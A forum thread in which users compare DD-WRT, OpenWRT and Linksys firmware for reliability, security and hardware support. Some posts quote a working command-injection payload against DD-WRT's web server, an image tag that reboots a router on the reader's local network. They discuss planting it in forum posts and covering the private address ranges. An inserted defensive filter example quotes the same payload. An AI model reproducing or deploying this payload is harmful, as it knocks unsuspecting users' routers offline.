
Your thoughts about DD-WRT....

How good of an idea is it to rely on DD-WRT firmware to handle router security instead of its manufacturer's firmware?

How reliable is this firmware? Stable?

Robust security? No malicious source code? Backdoors?

What are your experiences with DD-WRT... any thoughts, comments, or concerns?


I'd recommend it. I run it on both my WRT-54G routers, and it is far more robust than the standard Linksys firmware. Really, the only reason I bought the routers was to run it. Just be sure the router you purchase will run the full version, as there are many different configurations for routers of the same model. Just do your research and check the serial numbers against those provided at the DD-WRT site.

As for back doors, one would have to analyze the code and look for a "backdoor" user and passwd, which I have not done.

Edited by tekio

How good of an idea is it to rely on DD-WRT firmware to handle router security instead of its manufacturer's firmware?

How reliable is this firmware? Stable?

Robust security? No malicious source code? Backdoors?

What are your experiences with DD-WRT... any thoughts, comments, or concerns?

The thing about both DD-WRT and Linksys's firmware is that the source is out for both of them. You can check for backdoors, and as heavily worked on as both are, any would have been found and announced by now.

DD-WRT uses iptables, I believe, for its firewall. iptables is old and well established as one of the best firewalls out there.


I use a DD-WRT variant out of necessity. Linksys thought it was a good idea to keep outgoing connection attempts in the state table for weeks. So whenever you fire up something like a torrent client and fire off a few hundred connection attempts (most of which will fail), you DOS yourself.

There's no reason to trust or mistrust these distros any more or less than any other small Linux distro. One thing to remember is that people rarely upgrade these. Mine has been on there for 2 years or so, haven't upgraded it. If there are any remote vulns in the kernel, I'm really hanging out here. As for system security, there are not usually any services open on the internet side, so it's OK. It should be no different than the default firmware.


I use a DD-WRT variant out of necessity. Linksys thought it was a good idea to keep outgoing connection attempts in the state table for weeks. So whenever you fire up something like a torrent client and fire off a few hundred connection attempts (most of which will fail), you DOS yourself.

There's no reason to trust or mistrust these distros any more or less than any other small Linux distro. One thing to remember is that people rarely upgrade these. Mine has been on there for 2 years or so, haven't upgraded it. If there are any remote vulns in the kernel, I'm really hanging out here. As for system security, there are not usually any services open on the internet side, so it's OK. It should be no different than the default firmware.

There was a vulnerability for DD-WRT that was published a while back. It's only a problem if you have decided to allow management of the router via the web. That's probably not a very good idea anyway. The info is here.

http://www.dd-wrt.com/dd-wrtv3/community/developmentnews/34-dd-wrt-httpd-vulnerability-milw0rmcom-report.html


I use a DD-WRT variant out of necessity. Linksys thought it was a good idea to keep outgoing connection attempts in the state table for weeks. So whenever you fire up something like a torrent client and fire off a few hundred connection attempts (most of which will fail), you DOS yourself.

There's no reason to trust or mistrust these distros any more or less than any other small Linux distro. One thing to remember is that people rarely upgrade these. Mine has been on there for 2 years or so, haven't upgraded it. If there are any remote vulns in the kernel, I'm really hanging out here. As for system security, there are not usually any services open on the internet side, so it's OK. It should be no different than the default firmware.

There was a vulnerability for DD-WRT that was published a while back. It's only a problem if you have decided to allow management of the router via the web. That's probably not a very good idea anyway. The info is here.

http://www.dd-wrt.com/dd-wrtv3/community/developmentnews/34-dd-wrt-httpd-vulnerability-milw0rmcom-report.html

Well, there's more to it than that.


<img src="http://192.168.1.1/cgi-bin/;reboot">

Combined with an img bbcode tag on these forums (with a redirect if needed) and anyone who views your thread is kicked offline.


How good of an idea is it to rely on DD-WRT firmware to handle router security instead of its manufacturer's firmware?

How reliable is this firmware? Stable?

Robust security? No malicious source code? Backdoors?

What are your experiences with DD-WRT... any thoughts, comments, or concerns?

I just recently started using the DD-WRT firmware on my router. I started using it because I have a lot of outbound connections and, as Ohm said, the Linksys firmware just doesn't cut it. I like the expanded functionality of the firmware as well as the fact that I can set up my own custom iptables filter rules if I want.


Because DD-WRT's filesystem is read-only in memory, I prefer OpenWRT. I'm currently running OpenWRT on four corporate routers, two of which are used by the company as dedicated OpenVPN appliances.


I use a DD-WRT variant out of necessity. Linksys thought it was a good idea to keep outgoing connection attempts in the state table for weeks. So whenever you fire up something like a torrent client and fire off a few hundred connection attempts (most of which will fail), you DOS yourself.

There's no reason to trust or mistrust these distros any more or less than any other small Linux distro. One thing to remember is that people rarely upgrade these. Mine has been on there for 2 years or so, haven't upgraded it. If there are any remote vulns in the kernel, I'm really hanging out here. As for system security, there are not usually any services open on the internet side, so it's OK. It should be no different than the default firmware.

There was a vulnerability for DD-WRT that was published a while back. It's only a problem if you have decided to allow management of the router via the web. That's probably not a very good idea anyway. The info is here.

http://www.dd-wrt.com/dd-wrtv3/community/developmentnews/34-dd-wrt-httpd-vulnerability-milw0rmcom-report.html

Well, there's more to it than that.


<img src="http://192.168.1.1/cgi-bin/;reboot">

Combined with an img bbcode tag on these forums (with a redirect if needed) and anyone who views your thread is kicked offline.

Anyone who leaves their router/network on the default network range isn't security minded in the first place.


So make 256 of these image tags.


I was just discussing DD-WRT with a friend the other day, and he recommended OpenWRT instead.

Does anyone have any experience with OpenWRT? What are the practical differences between OpenWRT and DD-WRT?


My main reason for choosing DD-WRT was because there are mini versions for the lesser-powered Linksys WRT-54Gs (like the GS series). I tried OpenWRT, but it bricked my router due to a lack of studying on my part. After installing a mini version of DD-WRT via TFTP it came back to life.


So make 256 of these image tags.

Not just 256. You would need a lot more than that.

192.168.x.x

172.(16-31).x.x

10.x.x.x

And that's if they stick within the reserved private IP ranges.

I was just discussing DD-WRT with a friend the other day, and he recommended OpenWRT instead.

Does anyone have any experience with OpenWRT? What are the practical differences between OpenWRT and DD-WRT?

OpenWRT is a lot more flexible with hardware mods. OpenWRT on the Fonera or Linksys was the first to have bit-banging I2C and SD card interfaces, and DD-WRT hasn't successfully ported most of those features, but tries to keep up. Better packaging system too.


That's also assuming the router's address is .1 as well. I guess the point is that having your router on a non-default network, possibly with a host address other than .1, will prevent blind attacks like this.

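The exchange above turns on a forum rendering an image tag whose URL points into the reader's own LAN. As an added example that is not part of the thread or of any forum software, here is a forum-side check that flags such image sources before a post is rendered; the function names and the sample post are constructed for illustration, apart from the one URL quoted in the thread.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Characters that have no business in an image path but matter to a shell.
SHELL_META = set(";|&`$<>")

class ImgCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in a rendered post."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.sources += [v for k, v in attrs if k == "src" and v]

def classify(url):
    """Return the reasons an image URL should be rejected (empty list = ok)."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons = []
    if host:
        try:
            ip = ipaddress.ip_address(host)
            # Covers 10/8, 172.16/12 and 192.168/16, the ranges listed above,
            # whatever the host octet is, so no per-address guessing is needed.
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                reasons.append("internal-address")
        except ValueError:
            # Not an IP literal: single-label names only resolve locally.
            if "." not in host:
                reasons.append("internal-name")
    if SHELL_META & set(parts.path):
        reasons.append("shell-metachar-in-path")
    return reasons

def audit_post(html):
    """Map each suspicious image source in a post to its rejection reasons."""
    collector = ImgCollector()
    collector.feed(html)
    return {src: classify(src) for src in collector.sources if classify(src)}

# Constructed sample post; the first URL is the one quoted in the thread.
SAMPLE_POST = (
    '<p>nice router</p><img src="http://192.168.1.1/cgi-bin/;reboot">'
    '<img src="http://10.0.0.138/logo.png">'
    '<img src="https://example.com/cat.png">'
)

if __name__ == "__main__":
    for src, why in audit_post(SAMPLE_POST).items():
        print(src, why)
```

A URL on a public host that redirects to an internal address passes this static check, which is the case the "with a redirect if needed" remark describes, so the filter narrows the exposure rather than replacing a fixed router firmware.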

The firmware won't run on my router, so I'm going to have to buy a new one anyway. I'm mainly just looking for the VPN and client mode functionality. Any recommendations for routers?


To work with dd-WRT, the router would have to be a Linksys WRT-series.

Some of the newer (smaller, all-black) ones lack enough memory to support dd-WRT. Pick up one of the classic Linksys "black-and-blue" models and you should be fine. I have a WRT300N model 1 and it runs great under dd-WRT, even better than the original Linksys firmware. I've used it as a wireless bridge, a VPN router, and even as a network adapter for an old laptop with no onboard wifi or USB.


To work with dd-WRT, the router would have to be a Linksys WRT-series.

So wrong, that "Wrong!" is not enough. :P

http://www.dd-wrt.com/wiki/index.php/Supported_Devices

http://www.dd-wrt.com/dd-wrtv3/dd-wrt/hardware.html

dd-wrt runs on more routing hardware than toasters run Linux and pornsites have popups.

Holy shit! That IS impressive.

Though I have had trouble installing it on those newer Linksys WRT models.


Though I have had trouble installing it on those newer Linksys WRT models.

Most newer WRTs have a VxWorks platform instead of just Linux, so it is harder to replace. Also, skimping on hardware options like flash and RAM made full dd-wrt options impossible, so you get the mini packs. Eh.


I am still curious as to the operating differences between DD-WRT and OpenWRT. Time to do some research.


My conclusions as far as the philosophical standpoints of the two:

OpenWRT is geared more toward customization, e.g. OpenWRT has a package/addon management system.

And DD-WRT is an all-in-one solution deal, being simplistic.

Edited by schippystrich

Well, I may be drifting away from the question asked but.

I have 3 routers in my house, 2 DD-WRT and 1 that runs OpenWRT.

All the DD-WRT routers work perfectly, all full version installs running on WRT54G pre-version 5 routers, though for me OpenWRT kinda has its flaws. (And pros.) I use OpenWRT for ssh/php; even though DD-WRT can do it as well, it never was as good at it as OpenWRT was. But anywho, I can run IRC bots and the like off my OpenWRT router. It's pretty neat, I'll give it that. OpenDNS for some reason has problems with my OpenWRT router too.

So... I guess my recommendation is, if you are just using it for a router (nothing special, other than maybe increasing the output of the wireless antennas) then I'd say go DD-WRT. If you're going to need the space, and want a very minimalistic experience in which you can copy over files, or even run a web server off of, then OpenWRT is for you.

Forgive my horrible writing technique, jumping all over the place, and bad grammar.

Oh right, and also. Towards exploits etc. DD-WRT isn't as vulnerable to this, but OpenWRT is known for its ...problems security wise. I can't remember where the article was, but reports said that douche-bags were using OpenWRT routers as bots for botnets, so. If you do go OpenWRT, pick a good password for administration? :3

Okay, hopefully that helped. *Dance, Dance, Dance*

